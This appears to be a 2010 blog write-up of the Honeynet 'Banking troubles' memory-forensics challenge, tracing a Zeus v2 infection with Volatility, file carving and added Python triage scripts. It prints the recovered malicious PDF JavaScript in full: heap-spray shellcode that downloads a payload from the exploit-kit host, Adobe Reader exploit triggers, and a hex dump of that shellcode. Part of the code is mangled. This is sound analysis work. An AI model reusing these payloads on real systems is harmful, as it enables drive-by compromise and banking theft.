Wednesday, April 28, 2010

The life and adventures of Bobinson Vmemo (heck, just call’em Bob)

About two weeks ago I returned from the excellent Digital Forensics training in Vienna and was eager to test the acquired skills on some live material. When browsing the Honeynet project site I discovered exactly what I needed: Forensic Challenge part 3, Banking troubles.

This post describes my approach to that challenge, the tools I used and some very dumb mistakes you should not commit after reading it ;). Nothing sensational, but it may be helpful to someone just starting out in the digital forensics and malware analysis field (like me).

All the tools used below are, to my knowledge, free for personal use and mostly open-source.

The deadline to submit results passed on April 26, so any further disclosure is completely legitimate (though don't read any further if you want to crack this exercise yourself).

So I downloaded the exercise image and fired up a VirtualBox machine with CAINE, an excellent set of forensic tools wrapped in a Linux LiveCD (which comes in handy when analyzing malware; you know, for kids).

So the image is unzipped, loaded in CAINE's main interface and... fsstat FAIL. OK, maybe I should set the offset, 63 maybe? Nope, still no luck. Maybe Autopsy? The image loaded and a keyword search gave some results, but no partitions were discovered, so still a no-go. Hmm, let's review the challenge intro...

Yep, it is a RAM image, not an HDD image (and yes, now I know I should read the challenge description first, maybe two times in a row). I didn't know any tools to analyze RAM images, but Mommy taught me how to google, so... download Volatility.

The good thing is that CAINE already has Python included, so I just unzipped it and jumped straight into action:

Let's check what processes are running

root@caine:python volatility procscan2 -f /path/to/image/hn_forensics >processes.txt

and where they connect

root@caine:python volatility connscan2 -f /path/to/image/hn_forensics >connections.txt

And what do we see:

Local Address             Remote Address            Pid
------------------------- ------------------------- ------
192.168.0.176:1176        212.150.164.203:80        888
192.168.0.176:1189        192.168.0.1:9393          1244
192.168.0.176:2869        192.168.0.1:30379         1244
192.168.0.176:2869        192.168.0.1:30380         4
0.0.0.0:0                 80.206.204.129:0          0
127.0.0.1:1168            127.0.0.1:1169            888
192.168.0.176:1172        66.249.91.104:80          888
127.0.0.1:1169            127.0.0.1:1168            888
192.168.0.176:1171        66.249.90.104:80          888
192.168.0.176:1178        212.150.164.203:80        1752
192.168.0.176:1184        193.104.22.71:80          880
192.168.0.176:1185        193.104.22.71:80          880

192.168.0.176 is apparently the victim's address, 192.168.0.1 is the network gateway (at least, so I guess), and 66.249.90.104 is Google.

And everything else is VERY interesting:

Date (UTC)       | Domain                                                             | IP                                               | Reverse Lookup | Description                      | Registrant                              | ASN
---------------- | ------------------------------------------------------------------ | ------------------------------------------------ | -------------- | -------------------------------- | --------------------------------------- | -----
2010/02/26_18:04 | search-network-plus.com/                                           | 212.150.164.203                                  | -              | YES exploit kit                  | Antonio Perino antonioperinom@yahoo.com | 1680
2010/02/26_18:04 | search-network-plus.com/admin/                                     | 212.150.164.203                                  | -              | control panel of YES exploit kit | Antonio Perino antonioperinom@yahoo.com | 1680
2010/02/26_18:04 | search-network-plus.com/cache/PDF.php?st=Internet%20Explorer%206.0 | 212.150.164.203                                  | -              | pdf exploit                      | Antonio Perino antonioperinom@yahoo.com | 1680
2010/02/26_18:04 | search-network-plus.com/load.php?a=a&e=1                           | 212.150.164.203                                  | -              | zeus v2 trojan                   | Antonio Perino antonioperinom@yahoo.com | 1680
2010/02/26_18:04 | -                                                                  | 193.104.22.71/~produkt/9j856f_4m9y8urb.php       | -              | zeus v2 drop zone                | -                                       | 34305
2010/02/26_18:04 | -                                                                  | 193.104.22.71/~produkt/983745213424/34650798253  | -              | zeus v2 config file              | -                                       | 34305
2010/01/02_07:15 | excellenthostingservice.com/dkir8445g.php                          | 193.104.22.71                                    | -              | zeus v2 drop zone                | Andrey Zubkov / xm@qx8.ru               | 34305
2009/12/27_11:46 | excellenthostingservice.com/jugd63885.exe                          | 193.104.22.71                                    | -              | zeus v2 trojan                   | Andrey Zubkov / xm@qx8.ru               | 34305
2009/12/27_11:46 | excellenthostingservice.com/kdfjhguv45yt5.bin                      | 193.104.22.71                                    | -              | zeus v2 config file              | Andrey Zubkov / xm@qx8.ru               | 34305

copyright © 2009 www.malwaredomainlist.com

Looks like someone got himself thunderbolted ;)

OK, now which processes connect to these nasty places?

Not surprisingly, there are:

1752 888 Sat Feb 27 20:12:23 2010 0x02261ac8 0x04040300 AcroRd32.exe

888 1756 Sat Feb 27 20:11:53 2010 0x02268220 0x04040380 firefox.exe

(Acrobat Reader is a child of Firefox, which tells us, considering also the briefing, that the infection vector was likely a malicious PDF downloaded from the Intertubes) and last but not least

880 688 Fri Feb 26 03:34:07 2010 0x02466a70 0x040400e0 svchost.exe
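The two steps above, joining connscan2 output to process lineage, are easy to do by hand for a dozen rows but tedious for a full image. Here is a small script I am adding as an example (not part of the original post and not a Volatility plugin): it parses the connscan2 and psscan2 rows quoted above, treats the two Malware Domain List addresses as known-bad, flags every connection to a known-bad or other routable host, and walks the parent chain for the owning PID. The column layouts are assumed to be the ones shown above; the sample rows are copied from them, and a parent PID the scan did not return (like 1756) is reported as unknown rather than crashing the walk.

```python
import ipaddress
import re

# Constructed sample input: connscan2 rows copied from the output quoted in the post.
CONNSCAN_OUTPUT = """\
Local Address             Remote Address            Pid
------------------------- ------------------------- ------
192.168.0.176:1176        212.150.164.203:80        888
192.168.0.176:1189        192.168.0.1:9393          1244
0.0.0.0:0                 80.206.204.129:0          0
127.0.0.1:1168            127.0.0.1:1169            888
192.168.0.176:1172        66.249.91.104:80          888
192.168.0.176:1178        212.150.164.203:80        1752
192.168.0.176:1184        193.104.22.71:80          880
192.168.0.176:1185        193.104.22.71:80          880
"""

# psscan2-style rows (PID, PPID, creation time, offset, PDB, image name) quoted in the post.
PSSCAN_OUTPUT = """\
1752 888 Sat Feb 27 20:12:23 2010 0x02261ac8 0x04040300 AcroRd32.exe
888 1756 Sat Feb 27 20:11:53 2010 0x02268220 0x04040380 firefox.exe
880 688 Fri Feb 26 03:34:07 2010 0x02466a70 0x040400e0 svchost.exe
"""

# The two addresses the Malware Domain List entries tie to the exploit kit and the Zeus drop zone.
KNOWN_BAD = {"212.150.164.203", "193.104.22.71"}

CONN_RE = re.compile(r"^(\S+):(\d+)\s+(\S+):(\d+)\s+(\d+)\s*$")
PROC_RE = re.compile(r"^(\d+)\s+(\d+)\s+(.+?)\s+(0x[0-9a-fA-F]+)\s+(0x[0-9a-fA-F]+)\s+(\S+)\s*$")


def parse_connections(text):
    """One dict per data row of connscan-style output; header and ruler lines do not match."""
    conns = []
    for line in text.splitlines():
        m = CONN_RE.match(line.strip())
        if m:
            conns.append({"local": m.group(1), "lport": int(m.group(2)),
                          "remote": m.group(3), "rport": int(m.group(4)),
                          "pid": int(m.group(5))})
    return conns


def parse_processes(text):
    """Map PID -> (PPID, image name) from psscan-style rows."""
    procs = {}
    for line in text.splitlines():
        m = PROC_RE.match(line.strip())
        if m:
            procs[int(m.group(1))] = (int(m.group(2)), m.group(6))
    return procs


def is_external(ip):
    """True for routable addresses; RFC1918, loopback, link-local and 0.0.0.0 are skipped."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_unspecified or addr.is_link_local)


def lineage(pid, procs):
    """Walk parent pointers; stops at the first PID the scan did not return (marked unknown)."""
    chain, seen = [], set()
    while pid not in seen:          # guards against a PPID loop in a damaged image
        seen.add(pid)
        if pid not in procs:
            chain.append(f"unknown({pid})")
            break
        ppid, name = procs[pid]
        chain.append(f"{name}({pid})")
        pid = ppid
    return chain


def triage(conns, procs, known_bad):
    """Flag connections to known-bad or any other external host, with the owning process lineage."""
    findings = []
    for c in conns:
        if c["remote"] in known_bad:
            reason = "known-bad"
        elif is_external(c["remote"]):
            reason = "external"
        else:
            continue
        findings.append({"pid": c["pid"], "remote": f"{c['remote']}:{c['rport']}",
                         "reason": reason, "lineage": " <- ".join(lineage(c["pid"], procs))})
    return findings


if __name__ == "__main__":
    for f in triage(parse_connections(CONNSCAN_OUTPUT), parse_processes(PSSCAN_OUTPUT), KNOWN_BAD):
        print(f"[{f['reason']:9}] pid {f['pid']:<5} -> {f['remote']:<22} {f['lineage']}")
```

Run against the real text files saved with the `>` redirections above, it gives you the same picture as the manual walk: AcroRd32.exe(1752) under firefox.exe(888) talking to the exploit-kit host, and svchost.exe(880) talking to the drop zone. The "external" bucket (here Google and the stale 80.206.204.129 entry owned by PID 0) is the list you still have to look at by hand.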

Let's dump 'em!

root@caine:python volatility procdump -f /path/to/image/hn_forensics -p 1752

volatility: error: Unable to load image. Possible causes: invalid dtb, wrong image type, unsupported image type.

Uh-oh. Same with the other processes. So, what image type exactly don't you like?

root@caine:python volatility ident -f /path/to/image/hn_forensics

IMAGE NAME: /path/to/image/hn_forensics

IMAGE TYPE: UNKNOWN

What do you mean, UNKNOWN?

[...Skipped 2 days of googling, examining the image with a hex/binary editor, googling again, downloading and applying countless tools, more googling, and finally stumbling upon the image in CAINE's file explorer, which indicated that hn_forensics is actually a tar file]

Enter Bob.vmem

Finally, the executables are dumped and sent straight to VirusTotal. 0/40 (actually, svchost.exe got one hit from some obscure CAT AV, but let's count it as a false positive). What next?

Maybe something interesting is in the processes' memory?

root@caine:python volatility memdmp -f /path/to/image/Bob.vmem -p pid

Now, just opening these dumps in a hex/binary editor gives some useful results: you can determine the machine and user name (which is Administrator; ah, so unwise of you, Bob!), environment variables etc.

And a bit more (here are just some sample strings I found):

Acrord32 (1752)

GET /~produkt/983745213424/34650798253 HTTP/1.1

Accept: */*

Connection: Close

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: 193.104.22.71 (familiar address, heh?)

Pragma: no-cache

w-form-urlencoded

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: activex.microsoft.com

Content-Length: 73

Connection: Keep-Alive

Cache-Control: no-cache

MIMETYPE=application/x-silverlight-2&CLSID=application_2F_x-silverlight-2

http://193.104.22.71/~produkt/9j856f_4m9y8urb.php (looks totally benign to me!)

115f8a6b Host: 193.104.22.71

159f5529 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

POST /~produkt/9j856f_4m9y8urb.php HTTP/1.1.

http://193.104.22.71/~produkt/9j856f_4m9y8urb.php

1a80cf51 A V I R A 2 1 0 8

1b11a53f http://193.104.22.71/~produkt/69825439870/73846525#

http://193.104.22.71/~produkt/9j856f_4m9y8urb.php&

1b11a5c7 !*.microsoft.com/

http:/ m\Uffffffff\Uffffffffspac

?odnoklassniki. (Bob, someone misses you in Russia)

vko3kte@*/logi

COMPUTERNAME=BOB-DCADFEDC55C

urlmon.dll ObtainUserAgentString

https://onlineeast#.bankofamerica.com/cgi-bin/ias/*/GotoWelcome

ACustomerServiceMenuEntryPoint?custAction=75

GRABBED TAN

pass

ASKIPPED TAN:

Cookies:

Path: atdmt.com/

MUID=94FE735020664E66A3C9C9D5F41F5B6F

Path: rad.msn.com/

FC00=FB=

FC01=FB=

FC02=FB=

FC03=FB=

FC04=FB=

FC05=FB=

FC06=FB=

FC07=FB=

FC08=FB=

Path: ad.wsod.com/

u_1=4b87435bc9aef

Path: google.com/

PREF=ID=05cbfa879c788048:U=6d9c1ca8f172cf34:TM=1267155808:LM=1267155821:S=HPq9qDiZCOp14r3Q

Path: kontera.com/

cluid=-8245845131267300210411

Path: questionmarket.com/

CS1=707381-23-1

Path: msn.com/

MC1=V=3&GUID=2896b15715de4227be7aa457546a3447

mh=MSFT

CC=US

CULTURE=EN-US

MUID=94FE735020664E66A3C9C9D5F41F5B6F

Path: www.msn.com/

hpsvr=M:5|F:5|T:5|E:5|D:blu|W:F

hpcli=W.H|L.|S.|R.|U.L|C.|H.

ushpwea=wc:USNY1232

wpv=2

Path: oldversion.com/

__utma=183186040.157986524.1267155813.1267155813.1267300204.2

__utmz=183186040.1267300204.2.2.utmccn=(organic)|utmcsr=google|utmctr=old+software|utmcmd=organi

https://banking.dee/cgi/ueberweisu

Registered email address*

onClick="javascript:handlePageLink('/internetBanking/RequestRouter?requestCmdId=AccountDetails

Account Name

account-history-wait.jsp" method="post">

id="dgDepositAcctsheader0"*>

You betcha there are some banking troubles!
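Scrolling through a 100 MB dump in a hex editor is how I found the strings above, but the same thing can be scripted. The following is an example I am adding here, not code from the post or from Volatility: a minimal strings extractor that pulls both ASCII runs and UTF-16LE runs (Windows stores environment variables and many of the injected-form strings as UTF-16, which is why "A V I R A 2 1 0 8" above shows up with spaces in a plain ASCII view) and then buckets the hits by indicator type: HTTP request lines, Host headers, URLs, environment variables and banking-related keywords. The input is a small constructed blob that imitates what the 1752 dump contained; the indicator patterns are my own choice.

```python
import re

# Constructed sample memory chunk: an HTTP request in ASCII, two environment variables stored as
# UTF-16LE (as Windows keeps them), some binary noise, a URL and a fragment of the injected form text.
SAMPLE_DUMP = (
    b"\x00\x8b\x45\x08\xff\x15"
    + b"GET /~produkt/983745213424/34650798253 HTTP/1.1\r\nHost: 193.104.22.71\r\n"
    + b"\x90\x90\x00\x00"
    + "COMPUTERNAME=BOB-DCADFEDC55C".encode("utf-16-le")
    + b"\x00\x00\x01\x02"
    + "USERNAME=Administrator".encode("utf-16-le")
    + b"\xde\xad"
    + b"http://193.104.22.71/~produkt/9j856f_4m9y8urb.php\x00"
    + b"GRABBED TAN\x00"
)

# Printable runs of at least six characters, once as plain ASCII and once as UTF-16LE.
ASCII_RE = re.compile(rb"[\x20-\x7e]{6,}")
UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")

# Indicator patterns (my own selection) applied to each decoded string.
INDICATORS = {
    "http_request": re.compile(r"^(GET|POST) \S+ HTTP/1\.[01]$"),
    "host_header": re.compile(r"^Host: \S+$"),
    "url": re.compile(r"https?://\S+"),
    "environment": re.compile(r"^(COMPUTERNAME|USERNAME|USERDOMAIN)="),
    "banking": re.compile(r"\b(TAN|bankofamerica|ueberweisung)\b", re.I),
}


def extract_strings(blob):
    """Return (offset, encoding, text) tuples for ASCII and UTF-16LE runs, ordered by offset."""
    found = []
    for m in ASCII_RE.finditer(blob):
        found.append((m.start(), "ascii", m.group().decode("ascii")))
    for m in UTF16_RE.finditer(blob):
        found.append((m.start(), "utf-16le", m.group().decode("utf-16-le")))
    return sorted(found)


def classify(strings):
    """Bucket strings by the indicator they match; strings matching nothing are dropped."""
    hits = {name: [] for name in INDICATORS}
    for offset, enc, text in strings:
        for name, pat in INDICATORS.items():
            if pat.search(text):
                hits[name].append((offset, enc, text))
    return hits


if __name__ == "__main__":
    for name, items in classify(extract_strings(SAMPLE_DUMP)).items():
        for offset, enc, text in items:
            print(f"{name:13} {offset:#08x} {enc:8} {text}")
```

Reading a real dump, replace SAMPLE_DUMP with `open("1752.dmp", "rb").read()` (or mmap it for large files); the UTF-16 pass is what surfaces the COMPUTERNAME and USERNAME values without the spaces between characters.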

OK, now we know what the tricks are, but who is playing them? It would be very helpful to take a look at that malicious PDF... Assuming it is in memory (and the briefing strongly hints at that), how can we find it?

Of course, you can dig up the PDF format specification and search for headers/footers in the dump manually, but isn't that so 90's?

One of CAINE's most useful utilities is FOREMOST, a file carving tool that searches an image for all files of a given type (executables, web pages, multimedia etc.) by their headers/footers. It is originally intended for HDD images, but it doesn't hurt to try it on a process RAM dump:

root@caine: foremost -t pdf -i /path/to/image/1752.dmp -o 1752

You can actually scan for several or even all types of files, but it takes loads of time and HDD space (there are many false positives like 70 MB gif images and so on), so let's just stick to pdf for now.

In the output folder we have 7 pdf files; 5 of them are slightly more than 400 bytes long (likely FPs) and the two others are ~60 and ~600 KB, and the former is encrypted. VirusTotal gives 0/40 for the first and 15/40 for the second. Looks like we have a hit.
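To show what foremost is doing under the hood, and to get the "which of these 7 is worth a look" answer without VirusTotal, here is an added example of my own (not foremost, not Didier Stevens' tools, not code from the post): a header/footer carver for PDFs run over a constructed memory blob, followed by a pdfid-style triage that counts the names an analyst cares about (/JavaScript, /JS, /OpenAction, /AA, /Launch, /Encrypt), flags tiny carves as likely false positives, and notes when the file is encrypted, which is the reason the ~60 KB hit above scanned clean. The blob contains three PDF-shaped files and one dangling header so the carver's failure mode (header with no footer) is exercised; the size threshold and keyword list are my assumptions.

```python
import re

HEADER = b"%PDF-"
FOOTER = b"%%EOF"
MAX_FILE = 5 * 1024 * 1024      # stop looking for a footer this far past a header
SUSPICIOUS = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch", b"/Encrypt"]


def build_sample_image():
    """Constructed process-memory look-alike: three PDF-shaped files and one dangling header in filler."""
    stream = b"4 0 obj\n<< /Length 2000 >>\nstream\n" + b"A" * 2000 + b"\nendstream\nendobj\n"
    benign = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
              b"2 0 obj\n<< /Type /Pages /Count 0 >>\nendobj\ntrailer\n<< /Root 1 0 R >>\n%%EOF\n")
    scripted = (b"%PDF-1.6\n1 0 obj\n<< /Type /Catalog /OpenAction 3 0 R >>\nendobj\n"
                b"3 0 obj\n<< /S /JavaScript /JS (app.alert(1)) >>\nendobj\n" + stream
                + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")
    encrypted = (b"%PDF-1.5\n1 0 obj\n<< /Type /Catalog >>\nendobj\n" + stream
                 + b"trailer\n<< /Root 1 0 R /Encrypt 9 0 R >>\n%%EOF\n")
    dangling = b"%PDF-1.3\n" + b"\x00" * 40     # header with no footer: must not yield a file
    filler = b"\x90" * 64
    return filler + benign + filler + scripted + b"\xff" * 16 + encrypted + filler + dangling


def carve_pdfs(image, max_file=MAX_FILE):
    """Return (offset, data) for every header..footer span, foremost-style.

    A header with no footer within max_file bytes is skipped and scanning resumes after it.
    """
    carved, pos = [], 0
    while True:
        start = image.find(HEADER, pos)
        if start < 0:
            break
        end = image.find(FOOTER, start, start + max_file)
        if end < 0:
            pos = start + len(HEADER)
            continue
        end += len(FOOTER)
        carved.append((start, image[start:end]))
        pos = end
    return carved


def triage_pdf(data, min_size=1024):
    """pdfid-style summary: size, likely-false-positive flag, encryption, and keyword counts."""
    counts = {}
    for key in SUSPICIOUS:
        # the negative lookahead keeps /JS from also matching /JSX-style longer names
        counts[key.decode()] = len(re.findall(re.escape(key) + rb"(?![A-Za-z])", data))
    return {
        "size": len(data),
        "likely_fp": len(data) < min_size,
        "encrypted": counts["/Encrypt"] > 0,
        "has_js": counts["/JavaScript"] > 0 or counts["/JS"] > 0,
        "keywords": counts,
    }


if __name__ == "__main__":
    for offset, data in carve_pdfs(build_sample_image()):
        report = triage_pdf(data)
        print(f"offset {offset:#08x} size {report['size']:6d} fp={report['likely_fp']} "
              f"js={report['has_js']} enc={report['encrypted']} {report['keywords']}")
```

On a real dump, the file sizes and the /Encrypt flag reproduce the observation above: the 400-byte carves are fragments, and an encrypted hit needs to be decrypted (or the object extracted from memory after Reader decrypted it) before any JavaScript scan means anything.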

Now, how can we determine what vulnerability was exploited and what the payload is? I could just transfer the pdf to a Windows machine and launch it, but somehow I felt uneasy about that ;). So googling directed me to Didier Stevens' blog, which hosts tools to extract objects (including malware scripts) from PDF files and a screencast on how to use them.

Following the screencast instructions I extracted the (probably) malicious JavaScript, which looked like this:

var xtdxJYVm='0111…<22>…';function yRgjvasM(EajhtdGQ,replace,RzUbJqHU){if(!(replace instanceof Array)){replace=new Array(replace);if(EajhtdGQ instanceof Array){while(EajhtdGQ.length>replace.length){replace[replace.length]=replace[0];}}}if(!(EajhtdGQ instanceof Array))EajhtdGQ=new Array(EajhtdGQ);while(EajhtdGQ.length>replace.length){replace[replace.length]='';}if(RzUbJqHU instanceof Array){for(WsvDXhZg in RzUbJqHU){RzUbJqHU[WsvDXhZg]=yRgjvasM(EajhtdGQ,replace,RzUbJqHU[WsvDXhZg]);}return RzUbJqHU;}for(var WsvDXhZg=0;WsvDXhZg-1){RzUbJqHU=RzUbJqHU.replace(EajhtdGQ[WsvDXhZg],replace[WsvDXhZg]);GlyomGyU=RzUbJqHU.indexOf(EajhtdGQ[WsvDXhZg],GlyomGyU);}}return RzUbJqHU;}function DgZCVgIX(xtdxJYVm){var VzBJVOyp=0,GlyomGyU=0,qTABhyTE;for(;GlyomGyU<8;glyomgyu++){qtabhyte=7-glyomgyu;vzbjvoyp+=dqakslkn(2,qtabhyte)*xtdxjyvm[glyomgyu];}return glyomgyu="0;var" vzbjvoyp="'';while(GlyomGyU

After some testing in SpiderMonkey and adding a } at the end, I submitted it to Wepawet for analysis.

The deobfuscation result was marked as benign (yes, I believe... believe you are lying!) and looked just a bit less... well, obfuscated:

function OzWJi(rzRoI, fxLUb){

while (rzRoI.length * 2 <>

rzRoI += rzRoI;

}

return rzRoI.substring(0, fxLUb / 2);

}

function bSuTN(){

var Uueqk = sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u323D\u0000%25%30%25%30%25%30%25%30%25%30%25%30");

var HWXsi = 202116108;

var ZkzwV = [];

var HsVTm = 4194304;

var EgAxi = Uueqk.length * 2;

var fxLUb = HsVTm - (EgAxi + 0x38);

var rzRoI = sly("\u9090\u9090");

rzRoI = OzWJi(rzRoI, fxLUb);

var tfFQG = (HWXsi - 4194304) / HsVTm;

for (var gtqHE = 0; gtqHE <>

ZkzwV[gtqHE] = rzRoI + Uueqk;

}

var eHmqR = sly("\u0c0c\u0c0c");

while (eHmqR.length <>

this .collabStore = Collab.collectEmailInfo({

subj : "", msg : eHmqR

}

);

}

function Soy(){

var dwl = new Array();

function ppu(BtM, dqO){

while (BtM.length * 2 <>

BtM += BtM;

}

BtM = BtM.substring(0, dqO / 2);

return BtM;

}

XrS = 0x30303030;

HRb = sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u313D\u0000\u0000%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26%23%26");

var jxU = 4194304;

var RaR = HRb.length * 2;

var dqO = jxU - (RaR + 0x38);

var BtM = sly("\u9090\u9090");

BtM = ppu(BtM, dqO);

var JYD = (XrS - 4194304) / jxU;

for (var Prn = 0; Prn <>

dwl[Prn] = BtM + HRb;

}

var IdI = "66055447950636260127";

for (sly = 0; sly <>

IdI += "3";

}

util.printf("%45000f", IdI);

}

function ynu(shG){

shG = shG.replace(/[\+1]/g, "0");

shG = shG.replace(/[\+2]/g, "9");

shG = shG.replace(/[\+3]/g, "8");

shG = shG.replace(/[\+4]/g, "7");

shG = shG.replace(/[\+5]/g, "6");

shG = shG.replace(/[\+6]/g, "5");

shG = shG.replace(/[\+7]/g, "4");

shG = shG.replace(/[\+8]/g, "3");

shG = shG.replace(/[\+9]/g, "2");

shG = shG.replace(/[\+0]/g, "1");

return shG;

}

function XiIHG(){

var cqcNr = sly("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u732F\u6165\u6372\u2D68\u656E\u7774\u726F\u2D6B\u6C70\u7375\u632E\u6D6F\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3620\u302E\u6526\u333D\u0000\u1334\u1334");

dPl = sly("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090") + cqcNr;

FQI = sly("\u9090\u9090");

fhT = 5 * 2;

sLa = fhT + dPl.length;

while (FQI.length <>

NJn = FQI.substring(0, sLa);

eUq = FQI.substring(0, FQI.length - sLa);

while (eUq.length + sLa < euq =" eUq">

Cwy = [];

for (XWT = 0; XWT <>

var kKG = 4012;

var LwZ = Array(kKG);

for (XWT = 0; XWT <>

LwZ[XWT] = sly("\u000a\u000a\u000a\u000a");

}

Collab.getIcon(LwZ + "_N.bundle");

}

var sly = unescape, ZgA = app.viewerVersion.toString(), TjP = this ;

if (ZgA <>

bSuTN();

}

if (ZgA >= 8 && ZgA <>

Soy();

}

if (ZgA <= 9){

XiIHG();

}

What next? Yes, submit it to Wepawet again :)

And…

Detection results

Detector: Jsand 1.02.02
Result: suspicious

Exploits: No exploits were identified.

Deobfuscation results

Evals: No evals.
Writes: No writes.

Network Activity

ActiveX controls: No objects/controls.

Shellcode and Malware (for each of the three blobs, the hexadecimal dump followed by its ASCII rendering):

33 c0 64 8b 40 30 78 0c  8b 40 0c 8b 70 1c ad 8b 
58 08 eb 09 8b 40 34 8d  40 7c 8b 58 3c 6a 44 5a 
d1 e2 2b e2 8b ec eb 4f  5a 52 83 ea 56 89 55 04 
56 57 8b 73 3c 8b 74 33  78 03 f3 56 8b 76 20 03 
f3 33 c9 49 50 41 ad 33  ff 36 0f be 14 03 38 f2 
74 08 c1 cf 0d 03 fa 40  eb ef 58 3b f8 75 e5 5e 
8b 46 24 03 c3 66 8b 0c  48 8b 56 1c 03 d3 8b 04 
8a 03 c3 5f 5e 50 c3 8d  7d 08 57 52 b8 33 ca 8a 
5b e8 a2 ff ff ff 32 c0  8b f7 f2 ae 4f b8 65 2e 
65 78 ab 66 98 66 ab b0  6c 8a e0 98 50 68 6f 6e 
2e 64 68 75 72 6c 6d 54  b8 8e 4e 0e ec ff 55 04 
93 50 33 c0 50 50 56 8b  55 04 83 c2 7f 83 c2 31 
52 50 b8 36 1a 2f 70 ff  55 04 5b 33 ff 57 56 b8 
98 fe 8a 0e ff 55 04 57  b8 ef ce e0 60 ff 55 04 
68 74 74 70 3a 2f 2f 73  65 61 72 63 68 2d 6e 65 
74 77 6f 72 6b 2d 70 6c  75 73 2e 63 6f 6d 2f 6c 
6f 61 64 2e 70 68 70 3f  61 3d 61 26 73 74 3d 49 
6e 74 65 72 6e 65 74 20  45 78 70 6c 6f 72 65 72 
20 36 2e 30 26 65 3d 32  00 00 25 00 30 00 25 00 
30 00 25 00 30 00 25 00  30 00 25 00 30 00 25 00 
30 00 
3.d.@0x..@..p...
X....@4.@|.X
